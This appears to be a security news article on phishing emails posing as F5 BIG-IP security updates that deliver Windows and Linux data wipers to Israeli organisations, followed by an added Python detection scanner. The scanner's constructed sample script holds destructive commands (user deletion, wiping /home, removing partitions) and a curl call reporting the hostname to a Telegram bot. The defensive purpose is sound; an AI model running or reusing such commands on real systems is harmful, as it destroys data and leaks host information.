The Israel National Cyber Directorate warns of phishing emails pretending to be F5 BIG-IP zero-day security updates that deploy Windows and Linux data wipers.
Israel’s National Cyber Directorate (INCD) acts as the CERT responsible for protecting the country from cyber threats and for warning organizations and citizens about known attacks.
Since October, Israel has been heavily targeted by pro-Palestinian and Iranian hacktivists, who have been conducting data theft and data-wiping attacks on organizations in the country.
In November, a new data wiper called BiBi Wiper was discovered that targeted both Linux and Windows devices and is believed to have been created by pro-Hamas hacktivists.
Fake F5 update deploys wiper
Yesterday, INCD warned of a new phishing attack deploying data wipers through emails pretending to be a warning about a zero-day vulnerability in F5 BIG-IP devices.
A pro-Palestinian hacktivist group named Handala told BleepingComputer that they were responsible for the phishing attack, stating it was deployed on numerous Israeli networks. BleepingComputer has not been able to verify these claims independently.
The phishing email warns that the F5 BIG-IP zero-day vulnerability is actively exploited in attacks, urging Israeli organizations to download and install a security update before their network is breached.
For Windows users, the email pushes an executable named F5UPDATER.exe [VirusTotal], and for Linux, the file is a shell script named update.sh [VirusTotal].
When launched, both the Windows and Linux versions attempt to impersonate an F5 security update by displaying the company’s logo on the screen.
For example, the Windows wiper will display a small screen branded with the F5 logo that pretends to be a security update installer.
When the Update button is clicked, the wiper will send a message containing information about the device to a Telegram channel and attempt to wipe all the data from the computer.
However, in BleepingComputer’s tests, the wiper is a bit buggy, not deleting all the files on a computer.
The Linux wiper is a shell script that first downloads the packages necessary to wipe the computer, which are xfsprogs, wipe, and parted.
These packages are used first to remove all users on the system and then to run the ‘wipe’ command to delete the associated home directories.
The wiper will then attempt to delete all operating system files and the partitions on the Linux device. When done, the Linux computer is rebooted to cause the partition changes to take effect.
Like the Windows wiper, the Linux version will communicate with a Telegram channel to provide information about the device and status updates.
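Detection-side illustration added here (not code from the article or from BleepingComputer): a small Python scanner that flags shell scripts exhibiting the sequence described above (tool fetch, user removal, home-directory wipe, partition changes, reboot, Telegram reporting), run over a constructed sample and a constructed benign maintenance script. The regex patterns, category names and verdict thresholds are my assumptions, not signatures from the page.

```python
import re

# Indicator categories follow the sequence the article describes (tool fetch, user removal,
# home-directory wipe, partition changes, reboot, Telegram reporting). Patterns are assumptions.
INDICATORS = {
    "fetch_wipe_tools": re.compile(r"\b(apt(-get)?|yum|dnf)\b.*\binstall\b.*\b(wipe|parted)\b"),
    "remove_users": re.compile(r"\b(userdel|deluser)\b"),
    "wipe_home": re.compile(r"\bwipe\b.*\s/home\b"),
    "partition_change": re.compile(r"\bparted\b.*\b(rm|mklabel|mkpart)\b"),
    "reboot": re.compile(r"\b(reboot|shutdown\s+-r)\b"),
    "telegram_c2": re.compile(r"api\.telegram\.org/bot"),
}

def scan_script(text):
    """Map each indicator category to the script line numbers (1-based) where it appears."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blank lines, comments and the shebang
        for name, pattern in INDICATORS.items():
            if pattern.search(stripped):
                hits.setdefault(name, []).append(lineno)
    return hits

def classify(hits):
    """Destructive steps combined with tool fetching or reporting is the wiper pattern."""
    destructive = {"remove_users", "wipe_home", "partition_change"} & set(hits)
    if destructive and ("telegram_c2" in hits or "fetch_wipe_tools" in hits):
        return "high"
    if len(destructive) >= 2:
        return "medium"
    return "low" if hits else "none"

# Constructed sample that mirrors the described sequence; it is not the real update.sh.
SUSPECT_SCRIPT = """#!/bin/bash
apt-get install -y xfsprogs wipe parted
curl -s "https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=<ID>&text=$(hostname)"
userdel -r deploy
wipe -rf /home
parted -s /dev/sda rm 1
reboot
"""

# Constructed benign maintenance script: shares a package install but none of the pattern.
BENIGN_SCRIPT = """#!/bin/bash
apt-get update && apt-get install -y xfsprogs
systemctl restart nginx
"""
```

Calling `classify(scan_script(SUSPECT_SCRIPT))` yields "high" while the benign script yields "none"; on a mail gateway the same scan can be run over any shell attachment before it reaches a user.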
Data wipers have become a big problem for Israel, with hacktivists commonly using them in destructive attacks to disrupt Israel’s operations and economy.
As always, the best defense is only to download files from email if they come from a trusted and verified source. Furthermore, security updates should only be downloaded directly from a hardware vendor, not third-party sites.